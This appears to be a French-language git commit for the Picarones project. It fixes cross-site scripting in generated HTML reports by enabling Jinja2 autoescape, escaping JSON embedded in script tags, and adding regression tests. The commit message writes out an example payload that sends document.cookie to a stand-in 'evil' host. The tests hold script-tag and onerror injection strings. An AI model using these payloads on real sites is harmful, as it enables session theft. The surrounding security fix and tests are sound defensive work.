fix(sprint-S1.1)!: corriger XSS critique via Jinja2 autoescape=False (Bandit B701, CWE-94)

Sprint S1 — Sécurité. Corrige la seule vulnérabilité HIGH severity
de l'audit Bandit : ``Environment(autoescape=False)`` dans
``picarones/reports/html/generator.py`` permettait à un nom de
corpus, un nom de moteur ou tout autre champ d'origine utilisateur
contenant ``<script>``, ``</title>`` ou ``" onerror="`` d'exécuter
du JavaScript dans tout rapport HTML généré.

Vecteur d'attaque démontré
--------------------------

Trois portes d'entrée :

1. ``base.html.j2:6`` — ``<title>Picarones — {{ corpus_name }}</title>``
Injection : ``corpus_name = "</title><script>fetch('//evil/'+document.cookie)</script>"``
Exécute du JS pour quiconque ouvre le rapport.

2. ``corpus_name`` injecté dans le JSON ``<script type="application/json">``
embarqué côté client. Une chaîne JSON valide contenant ``</script>``
termine le tag ``<script>`` parent — classic JSON-in-script XSS.

3. Engine names (issus de configs utilisateur ou imports HuggingFace
tiers) propagés dans le HTML via les renderers thématiques.

Le rapport est servi via ``/reports/{filename}`` (FastAPI), donc
l'exécution se déclenche dès qu'un autre utilisateur ouvre le
rapport — propagation latérale entre bibliothécaires d'une même
institution.

Correctifs (TDD : tests RED → fix → tests GREEN)
------------------------------------------------

**``picarones/reports/html/generator.py``** :

- ``_build_jinja_env`` : ``autoescape=False`` →
``autoescape=select_autoescape(["html", "j2", "xml"])``. Toute
variable injectée dans un template ``.html`` / ``.j2`` est
désormais auto-échappée par défaut.

- Helper ``_safe_json_for_script_tag(data)`` ajouté. Sérialise
``data`` puis remplace ``<``, ``>``, ``&`` par leurs séquences
d'échappement Unicode JSON (``<``, ``>``, ``&``).
JavaScript décode au parse — plus de tag-break possible même si
une chaîne JSON contient ``</script>``. Les 3 ``json.dumps`` de
la méthode ``generate()`` (report_data_json, i18n_json,
glossary_json) consomment ce helper.

**Templates** :

- ``view_analyses.html`` + ``view_ranking.html`` : 19 variables
``{{ *_html }}`` re-marquées ``| safe`` car elles portent du
HTML pré-construit légitime (renderers thématiques, vues
agrégées) — sinon double-échappement = HTML cassé.

- Variables d'origine utilisateur (``corpus_name`` dans
``base.html.j2``, ``sentence`` dans ``_narrative_summary.html``,
``friedman.interpretation`` dans ``_critical_difference.html``)
laissées sans ``| safe`` → désormais auto-échappées.

Tests
-----

**``tests/security/test_s1_xss_in_reports.py``** (5 nouveaux) :

- ``TestCorpusNameXSS::test_script_tag_in_corpus_name_is_escaped`` —
payload ``</title><script>alert('xss')</script>``, vérifie absence
du tag dans le HTML produit ET présence des caractères échappés.

- ``TestCorpusNameXSS::test_html_attribute_injection_in_corpus_name`` —
payload ``" onerror="alert(1)" foo="``, vérifie qu'aucune
attribute injection ne subsiste.

- ``TestCorpusNameXSS::test_corpus_name_with_unicode_renders_correctly`` —
garde-fou : ``Manuscrit médiéval — chartes XIII°`` reste lisible
après échappement (caractères Unicode safe préservés).

- ``TestEngineNameXSS::test_engine_name_with_script_is_escaped`` —
vecteur via ``EngineReport.engine_name``.

- ``TestJinja2EnvIsAutoescaped`` — anti-régression : Bandit B701
ne doit plus signaler le module ; ``select_autoescape`` activé.

Bandit
------

Avant H.7 : ``bandit -r picarones/`` → 1 HIGH (B701).
Après S1.1 : 0 HIGH, Medium et Low inchangés.

Tests
-----

- ``pytest tests/`` : 4130 passed (+5 nouveaux), 9 skipped, 24 deselected.
- ``ruff check`` : All checks passed.

CHANGELOG.md / README.md / CLAUDE.md
------------------------------------

Compteur tests synchronisé via ``scripts/gen_readme_tables.py``.

Reste pour S1
-------------

- S1.4 : tests d'attaque XXE (defusedxml).
- S1.5 : tests d'attaque ZIP slip.
- S1.6 : tests d'attaque SSRF.
- S1.7 : tests CSRF token requis.

https://claude.ai/code/session_01NxyVKqg2SowXLZdM4H1ZDE

CLAUDE.md

@@ -116,7 +116,7 @@ picarones/
 
 ## État des tests et bugs historiques
 
-`pytest tests/` → **4150 passed, 12 skipped, 8 deselected, 0 failed**
+`pytest tests/` → **4160 passed, 12 skipped, 8 deselected, 0 failed**
 (post-S59).  Les deselected sont les markers `live` (5 tests d'intégration
 contre vraie API/binaire) + `network` (3 tests qui hit le réseau réel),
 opt-in en local via `pytest -m live` ou `pytest -m network`.  Le
@@ -268,7 +268,7 @@ détecte, arbitre, rend.
 ## Contexte développement
 
 - **Environnement** : GitHub Codespaces, Python 3.11+
-- **Tests** : `pytest tests/ -q` → 4150 passed, 9 skipped, 24
+- **Tests** : `pytest tests/ -q` → 4160 passed, 9 skipped, 24
   deselected, 0 failed (post-v2.0).
 - **Manifeste architecture** : [`docs/explanation/architecture.md`](docs/explanation/architecture.md).
 - **API publique stable** : [`docs/reference/api-stable.md`](docs/reference/api-stable.md).

README.md

@@ -394,7 +394,7 @@ ruff check picarones/ tests/
 python -m mypy picarones/core/
 ```
 
-**Test suite**: ~4150 tests, ~3 min on a modern laptop. Coverage
+**Test suite**: ~4160 tests, ~3 min on a modern laptop. Coverage
 floor at 85% (currently ~87%). The `network` marker excludes tests
 requiring live HTTP. A handful of tests depend on optional engines
 (`pero-ocr`, `pytesseract`) and are skipped/fail gracefully when

picarones/reports/html/generator.py

@@ -77,21 +77,44 @@ _TEMPLATES_DIR = Path(__file__).parent / "templates"
 def _build_jinja_env():
     """Construit l'Environment Jinja2 pour le rapport.
 
-    Autoescape désactivé : le comportement est équivalent à celui du
-    ``_HTML_TEMPLATE.format()`` historique. Les variables injectées
-    (JSON embarqué, SVG généré, synthèse narrative issue de templates
-    internes) sont toutes produites par le code Picarones et ne
-    nécessitent pas d'échappement HTML.
+    Sprint S1 (Bandit B701, CWE-94) : autoescape activé via
+    ``select_autoescape``.  Les variables qui contiennent du HTML
+    pré-construit (renderers thématiques, SVG, JSON) sont marquées
+    avec ``| safe`` dans les templates ; les variables d'origine
+    utilisateur sont auto-échappées.
     """
-    from jinja2 import Environment, FileSystemLoader
+    from jinja2 import Environment, FileSystemLoader, select_autoescape
+
     env = Environment(
         loader=FileSystemLoader(str(_TEMPLATES_DIR)),
-        autoescape=False,
+        autoescape=select_autoescape(["html", "j2", "xml"]),
         keep_trailing_newline=True,
     )
     return env
 
 
+def _safe_json_for_script_tag(data: object) -> str:
+    """Sérialise data en JSON safe pour injection dans <script type="application/json">.
+
+    Sprint S1 — protection XSS : un fragment ``</script>`` dans une
+    chaîne JSON termine le tag <script> parent, même si la chaîne
+    est syntaxiquement bien formée côté JSON.
+
+    Solution standard : remplacer ``<``, ``>``, ``&`` par leurs
+    séquences d'échappement Unicode JSON.  JavaScript décode au
+    parse — plus de tag-break possible.
+    """
+    raw = json.dumps(data, ensure_ascii=False, separators=(",", ":"))
+    # On remplace ``<`` par ``<`` (séquence JSON, JavaScript la
+    # décode au parse en ``<``).  Idem ``>`` et ``&``.  Le ``\\`` du
+    # Python source produit un seul ``\`` dans la sortie.
+    return (
+        raw.replace("<", "\\u003c")
+        .replace(">", "\\u003e")
+        .replace("&", "\\u0026")
+    )
+
+
 # ---------------------------------------------------------------------------
 # Classe principale
 # ---------------------------------------------------------------------------
@@ -205,8 +228,8 @@ class ReportGenerator:
             normalization_profile=self.normalization_profile,
         )
 
-        report_json = json.dumps(report_data, ensure_ascii=False, separators=(",", ":"))
-        i18n_json = json.dumps(labels, ensure_ascii=False, separators=(",", ":"))
+        report_json = _safe_json_for_script_tag(report_data)
+        i18n_json = _safe_json_for_script_tag(labels)
         chartjs_js = _load_vendor_js("chart.umd.min.js")
 
         # Sprint 17 — rendu SVG du CDD côté serveur (statique, pas de JS)
@@ -221,7 +244,7 @@ class ReportGenerator:
         # Sprint 20 — glossaire contextuel chargé depuis YAML
         from picarones.reports.glossary import load_glossary
         glossary = load_glossary(self.lang)
-        glossary_json = json.dumps(glossary, ensure_ascii=False, separators=(",", ":"))
+        glossary_json = _safe_json_for_script_tag(glossary)
 
         section_html = self._build_section_html(report_data, labels)
 

picarones/reports/html/templates/view_analyses.html

@@ -157,10 +157,10 @@
       <div class="calibration-grid"
            style="display:grid;gap:1.2rem;align-items:start">
         {% if calibration_summary_html %}
-        <div>{{ calibration_summary_html }}</div>
+        <div>{{ calibration_summary_html | safe }}</div>
         {% endif %}
         {% if reliability_diagrams_html %}
-        <div>{{ reliability_diagrams_html }}</div>
+        <div>{{ reliability_diagrams_html | safe }}</div>
         {% endif %}
       </div>
       <div style="font-size:.72rem;color:var(--text-muted);margin-top:.6rem"
@@ -182,10 +182,10 @@
       <div class="ner-grid"
            style="display:grid;gap:1.2rem;align-items:start">
         {% if ner_summary_html %}
-        <div>{{ ner_summary_html }}</div>
+        <div>{{ ner_summary_html | safe }}</div>
         {% endif %}
         {% if ner_per_category_html %}
-        <div>{{ ner_per_category_html }}</div>
+        <div>{{ ner_per_category_html | safe }}</div>
         {% endif %}
       </div>
       <div style="font-size:.72rem;color:var(--text-muted);margin-top:.6rem"
@@ -205,7 +205,7 @@
          Adaptive : n'apparaît que si au moins un module a du signal. -->
     {% if philological_profile_html %}
     <div class="chart-card" style="grid-column:1/-1">
-      {{ philological_profile_html }}
+      {{ philological_profile_html | safe }}
     </div>
     {% endif %}
 
@@ -214,12 +214,12 @@
          un moteur a du signal. -->
     {% if searchability_html %}
     <div class="chart-card" style="grid-column:1/-1">
-      {{ searchability_html }}
+      {{ searchability_html | safe }}
     </div>
     {% endif %}
     {% if numerical_sequences_html %}
     <div class="chart-card" style="grid-column:1/-1">
-      {{ numerical_sequences_html }}
+      {{ numerical_sequences_html | safe }}
     </div>
     {% endif %}
 
@@ -227,7 +227,7 @@
          n'apparaît que si au moins un moteur a du signal. -->
     {% if readability_html %}
     <div class="chart-card" style="grid-column:1/-1">
-      {{ readability_html }}
+      {{ readability_html | safe }}
     </div>
     {% endif %}
 
@@ -235,7 +235,7 @@
          Adaptive : n'apparaît que si ≥ 2 moteurs avec taxonomie. -->
     {% if specialization_html %}
     <div class="chart-card" style="grid-column:1/-1">
-      {{ specialization_html }}
+      {{ specialization_html | safe }}
     </div>
     {% endif %}
 
@@ -246,10 +246,10 @@
       <div class="inter-engine-grid"
            style="display:grid;grid-template-columns:1fr 1fr;gap:1.2rem;align-items:start">
         {% if divergence_matrix_html %}
-        <div>{{ divergence_matrix_html }}</div>
+        <div>{{ divergence_matrix_html | safe }}</div>
         {% endif %}
         {% if oracle_gap_html %}
-        <div>{{ oracle_gap_html }}</div>
+        <div>{{ oracle_gap_html | safe }}</div>
         {% endif %}
       </div>
       <div style="font-size:.72rem;color:var(--text-muted);margin-top:.6rem"
@@ -268,17 +268,17 @@
          retourne du contenu (au moins une sous-section avec signal). -->
     {% if economics_view_html %}
     <div class="chart-card" style="grid-column:1/-1">
-      {{ economics_view_html }}
+      {{ economics_view_html | safe }}
     </div>
     {% endif %}
     {% if advanced_taxonomy_view_html %}
     <div class="chart-card" style="grid-column:1/-1">
-      {{ advanced_taxonomy_view_html }}
+      {{ advanced_taxonomy_view_html | safe }}
     </div>
     {% endif %}
     {% if diagnostics_view_html %}
     <div class="chart-card" style="grid-column:1/-1">
-      {{ diagnostics_view_html }}
+      {{ diagnostics_view_html | safe }}
     </div>
     {% endif %}
 
@@ -287,22 +287,22 @@
          Adaptive : ne s'affichent que si le calcul a remonté du signal. -->
     {% if rare_token_recall_html %}
     <div class="chart-card" style="grid-column:1/-1">
-      {{ rare_token_recall_html }}
+      {{ rare_token_recall_html | safe }}
     </div>
     {% endif %}
     {% if taxonomy_cooccurrence_html %}
     <div class="chart-card" style="grid-column:1/-1">
-      {{ taxonomy_cooccurrence_html }}
+      {{ taxonomy_cooccurrence_html | safe }}
     </div>
     {% endif %}
     {% if taxonomy_intra_doc_html %}
     <div class="chart-card" style="grid-column:1/-1">
-      {{ taxonomy_intra_doc_html }}
+      {{ taxonomy_intra_doc_html | safe }}
     </div>
     {% endif %}
     {% if marginal_cost_html %}
     <div class="chart-card" style="grid-column:1/-1">
-      {{ marginal_cost_html }}
+      {{ marginal_cost_html | safe }}
     </div>
     {% endif %}
 

picarones/reports/html/templates/view_ranking.html

@@ -47,7 +47,7 @@
     <!-- Sprint 46 — vue stratifiée par script_type (rapport adaptatif :
          section omise quand aucune strate n'est disponible) -->
     {% if stratified_ranking_html %}
-    {{ stratified_ranking_html }}
+    {{ stratified_ranking_html | safe }}
     {% endif %}
   </div>
 

tests/security/test_s1_xss_in_reports.py

@@ -0,0 +1,188 @@
+"""Sprint S1.3 — XSS dans le rapport HTML généré.
+
+Vérifie que tout contenu utilisateur (corpus_name, sentences narratives,
+nom de moteur) est échappé HTML dans le rapport produit par
+``picarones.reports.html.ReportGenerator``.
+
+Bandit B701 (CWE-94) avait flaggé ``Environment(autoescape=False)`` —
+ce test concrétise l'attaque que l'audit décrivait : un corpus nommé
+``</title><script>alert(1)</script>`` doit être inerte dans le HTML.
+"""
+
+from __future__ import annotations
+
+from pathlib import Path
+
+from picarones.evaluation.benchmark_result import (
+    BenchmarkResult,
+    DocumentResult,
+    EngineReport,
+)
+
+
+def _make_minimal_benchmark(
+    corpus_name: str,
+    engine_name: str = "tesseract",
+) -> BenchmarkResult:
+    """Construit un BenchmarkResult minimal valide avec le ``corpus_name`` fourni."""
+    from picarones.evaluation.metric_result import MetricsResult
+
+    metrics = MetricsResult(cer=0.0, wer=0.0, mer=0.0, wil=0.0)
+    doc = DocumentResult(
+        doc_id="doc01",
+        image_path="doc01.png",
+        ground_truth="Bonjour",
+        hypothesis="Bonjour",
+        metrics=metrics,
+        duration_seconds=0.1,
+    )
+    engine = EngineReport(
+        engine_name=engine_name,
+        engine_version="5.3.0",
+        engine_config={},
+        document_results=[doc],
+    )
+    return BenchmarkResult(
+        corpus_name=corpus_name,
+        corpus_source=None,
+        document_count=1,
+        engine_reports=[engine],
+    )
+
+
+# ──────────────────────────────────────────────────────────────────────
+# 1. corpus_name avec script tag → doit être échappé dans <title>
+# ──────────────────────────────────────────────────────────────────────
+
+
+class TestCorpusNameXSS:
+    """Le ``corpus_name`` est injecté dans ``<title>`` de
+    ``base.html.j2``.  Sans échappement, un nom malicieux compromet
+    tout rapport partagé."""
+
+    def test_script_tag_in_corpus_name_is_escaped(self, tmp_path: Path) -> None:
+        from picarones.reports.html import ReportGenerator
+
+        bench = _make_minimal_benchmark(
+            corpus_name="</title><script>alert('xss')</script>",
+        )
+        gen = ReportGenerator(bench)
+        out = tmp_path / "report.html"
+        gen.generate(out)
+
+        html = out.read_text()
+
+        # Le tag </title> ne doit PAS apparaître au milieu du HTML
+        # (autre que celui légitime à la fin du <head>) au point
+        # d'attacher un <script>.
+        assert "<script>alert('xss')</script>" not in html, (
+            "XSS confirmé : le script malicieux est exécutable dans le rapport.\n"
+            "Causes possibles : autoescape=False dans Jinja2 + corpus_name "
+            "non filtré."
+        )
+
+        # Forme correcte : caractères dangereux échappés.
+        assert "&lt;script&gt;alert(" in html or "&#x3c;script&#x3e;" in html.lower(), (
+            "Le ``<`` dans corpus_name doit être échappé en ``&lt;``."
+        )
+
+    def test_html_attribute_injection_in_corpus_name(self, tmp_path: Path) -> None:
+        """Cas d'attaque attribute-based : ``" onerror=alert(1)``
+        peut casser une balise si corpus_name est utilisée dans
+        un attribut."""
+        from picarones.reports.html import ReportGenerator
+
+        bench = _make_minimal_benchmark(
+            corpus_name='" onerror="alert(1)" foo="',
+        )
+        gen = ReportGenerator(bench)
+        out = tmp_path / "report.html"
+        gen.generate(out)
+
+        html = out.read_text()
+
+        # Le caractère ``"`` doit être échappé en ``&quot;`` ou
+        # ``&#34;`` partout où corpus_name est rendu.  Aucune
+        # attribute injection ne doit subsister.
+        assert ' onerror="alert(' not in html, (
+            "Attribute injection : un guillemet non échappé permet "
+            "d'injecter onerror=."
+        )
+
+    def test_corpus_name_with_unicode_renders_correctly(
+        self, tmp_path: Path,
+    ) -> None:
+        """Corollaire — vérifie qu'un nom Unicode légitime
+        (``Manuscrit médiéval — chartes XIII°``) reste lisible
+        après échappement."""
+        from picarones.reports.html import ReportGenerator
+
+        bench = _make_minimal_benchmark(
+            corpus_name="Manuscrit médiéval — chartes XIII°",
+        )
+        gen = ReportGenerator(bench)
+        out = tmp_path / "report.html"
+        gen.generate(out)
+
+        html = out.read_text()
+        # Caractères Unicode safe doivent rester intacts.
+        assert "Manuscrit médiéval" in html
+        assert "XIII°" in html
+
+
+# ─────────────────────────────────────────────────��────────────────────
+# 2. Engine name (moteur OCR) avec injection
+# ──────────────────────────────────────────────────────────────────────
+
+
+class TestEngineNameXSS:
+    """Le nom de moteur peut venir d'un import HuggingFace ou d'une
+    config utilisateur.  Doit être échappé dans tous les renderers
+    qui l'affichent."""
+
+    def test_engine_name_with_script_is_escaped(self, tmp_path: Path) -> None:
+        from picarones.reports.html import ReportGenerator
+
+        bench = _make_minimal_benchmark(
+            corpus_name="test",
+            engine_name="<script>alert('engine')</script>",
+        )
+        gen = ReportGenerator(bench)
+        out = tmp_path / "report.html"
+        gen.generate(out)
+
+        html = out.read_text()
+        assert "<script>alert('engine')</script>" not in html, (
+            "Engine name XSS : un nom de moteur malicieux est exécuté."
+        )
+
+
+# ──────────────────────────────────────────────────────────────────────
+# 3. Bandit B701 ne doit plus signaler autoescape=False
+# ──────────────────────────────────────────────────────────────────────
+
+
+class TestJinja2EnvIsAutoescaped:
+    """Garde-fou contre la régression : ``_build_jinja_env`` doit
+    retourner un Environment avec autoescape activé pour les
+    extensions HTML/J2."""
+
+    def test_env_has_autoescape_enabled_for_html(self) -> None:
+        from picarones.reports.html.generator import _build_jinja_env
+
+        env = _build_jinja_env()
+        # autoescape doit être un Callable (select_autoescape) ou True,
+        # pas False ni None.
+        autoescape = env.autoescape
+        assert autoescape, (
+            f"Jinja2 Environment.autoescape={autoescape!r} — XSS exposé."
+        )
+        # Si c'est une fonction (select_autoescape), elle doit
+        # retourner True pour les HTML/J2.
+        if callable(autoescape):
+            assert autoescape("base.html.j2"), (
+                "select_autoescape doit activer l'échappement pour .j2"
+            )
+            assert autoescape("any.html"), (
+                "select_autoescape doit activer l'échappement pour .html"
+            )